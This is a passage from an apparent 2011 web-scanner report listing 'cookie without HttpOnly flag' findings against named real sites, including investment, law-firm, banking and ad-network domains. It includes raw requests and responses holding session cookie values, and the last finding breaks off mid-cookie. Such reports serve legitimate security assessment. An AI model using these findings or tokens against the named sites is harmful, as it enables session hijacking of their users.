KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A08%3A06%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:08:06 GMT;path=/
KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:08:06 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/landmark_achievements.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
Referer: http://www.kkr.com/kpe/private_equity_overview.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A28%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E; KKR_BRIEFCASE=UPDATED%7C40585%2E2953356

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:08:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A08%3A06%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:08:06 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:08:06 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:08:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 13053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.31. http://www.kkr.com/investor/investor_relations_overview.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kkr.com
Path:	/investor/investor_relations_overview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KKR_SESSION=1255536235%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A19%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A19%27%7D%7CC8FCB2495904E459807FEEF5EC5F38A9;domain=www.kkr.com;expires=Fri, 11-May-2012 11:04:19 GMT;path=/
KKR_BRIEFCASE=UPDATED%7C40585%2E2946644;domain=www.kkr.com;expires=Fri, 11-May-2012 11:04:19 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investor/investor_relations_overview.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:04:19 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255536235%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A19%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A19%27%7D%7CC8FCB2495904E459807FEEF5EC5F38A9;domain=www.kkr.com;expires=Fri, 11-May-2012 11:04:19 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2946644;domain=www.kkr.com;expires=Fri, 11-May-2012 11:04:19 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:04:19 GMT;path=/
Vary: Accept-Encoding
Content-Length: 8289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.32. http://www.kkr.com/kpe/private_equity_overview.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kkr.com
Path:	/kpe/private_equity_overview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A06%3A12%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:12 GMT;path=/
KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:12 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kpe/private_equity_overview.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
Referer: http://www.kkr.com/investor/investor_relations_overview.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E; KKR_BRIEFCASE=UPDATED%7C40585%2E2953356

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:06:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A06%3A12%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:12 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:12 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:06:12 GMT;path=/
Vary: Accept-Encoding
Content-Length: 11703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.33. http://www.kkr.com/team/theteam.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kkr.com
Path:	/team/theteam.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A06%3A20%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:21 GMT;path=/
KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:21 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /team/theteam.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
Referer: http://www.kkr.com/company/landmark_achievements.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A42%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E; KKR_BRIEFCASE=UPDATED%7C40585%2E2953356

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:06:21 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A06%3A20%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:21 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:21 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:06:21 GMT;path=/
Vary: Accept-Encoding
Content-Length: 45588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.34. http://www.korteco.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.korteco.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS31e5fbde7def436979bdb9291b5781da=kqafn01oinjtbje997dusc7ce2; expires=Sat, 04 Jun 2011 16:44:44 GMT; path=/; domain=.korteco.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.35. http://www.milbank.com/en previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.milbank.com
Path:	/en

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=fsdizi55e3qmfmfninni5v2j; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=fsdizi55e3qmfmfninni5v2j; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>
           Milbank Home Page</title>
       <meta content="
...[SNIP]...

14.36. http://www.pillsburylaw.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pillsburylaw.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=11812913;path=/
CFTOKEN=26160612;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.37. http://www.pillsburylaw.com/connect_forgotpassword.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pillsburylaw.com
Path:	/connect_forgotpassword.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=11812912;path=/
CFTOKEN=34459793;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

14.38. http://www.pillsburylaw.com/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pillsburylaw.com
Path:	/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=11812912;path=/
CFTOKEN=34459793;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?pageid=12&itemid=1908 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

14.39. http://www.pillsburylaw.com/scripts/images/arrows-default.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pillsburylaw.com
Path:	/scripts/images/arrows-default.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=11812912;path=/
CFTOKEN=34459793;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 12:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
location: /404.htm
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

14.40. http://www.pomerantzlaw.com/cases.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pomerantzlaw.com
Path:	/cases.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.41. http://www.privateequityinfo.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.privateequityinfo.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.42. http://www.privatemoneytalk.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.privatemoneytalk.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=476ca5a720fd88c52806f4c507b4c8d3; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: www.privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 11:02:31 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=476ca5a720fd88c52806f4c507b4c8d3; path=/
Location: http://privatemoneytalk.com/?utm_source=msn&utm_medium=cpc&utm_term=private%20equity
Content-Length: 0
Content-Type: text/html; charset=UTF-8

14.43. http://www.provequity.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.provequity.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDASAQTRCB=BAMHPCLDDEKLDIMNNNEELLBB; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASAQTRCB=BAMHPCLDDEKLDIMNNNEELLBB; path=/
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...

14.44. http://www.providenceequitypartners.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.providenceequitypartners.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDASAQTRCB=CAMHPCLDELCDGHFEIMOCJHMO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.providenceequitypartners.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASAQTRCB=CAMHPCLDELCDGHFEIMOCJHMO; path=/
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...

14.45. http://www.stroock.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.stroock.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=6906920;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
CFTOKEN=39383083;expires=Sat, 04-May-2041 12:21:44 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.stroock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Stroock+%26+Stroock+%26+Lavan&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6906920;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
Set-Cookie: CFTOKEN=39383083;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv
...[SNIP]...

14.46. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.usaa.com
Path:	/inet/imco_mutualfund/ImMutualFunds

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
tempCookie=testCookie
dcenv=DCITC; path=/; domain=usaa.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.47. http://ad.amtk-media.com/iframe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PrefID=51-131422944; expires=Sat, 11 May 2013 23:37:12 GMT; path=/; domain=.amtk-media.com
CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:12 GMT; path=/; domain=.amtk-media.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.48. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.49. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
adImpCount=Z1-UkUPq1vFj8GCnevJA2KXPE2TFnOA0M_WT2exB_6Nh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MBxqPiAYpCYd3j_6MfsPlMh53jqED7k2YniAtZPVqfFWyxKvcAJbr9b_kzSFkanJuWO28abj1iv9Gv55XNWfMiw5pMuH6RTJNAHblpwBDk2T1wXcoL7Q2zkkhi9AC1e6PNmlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYex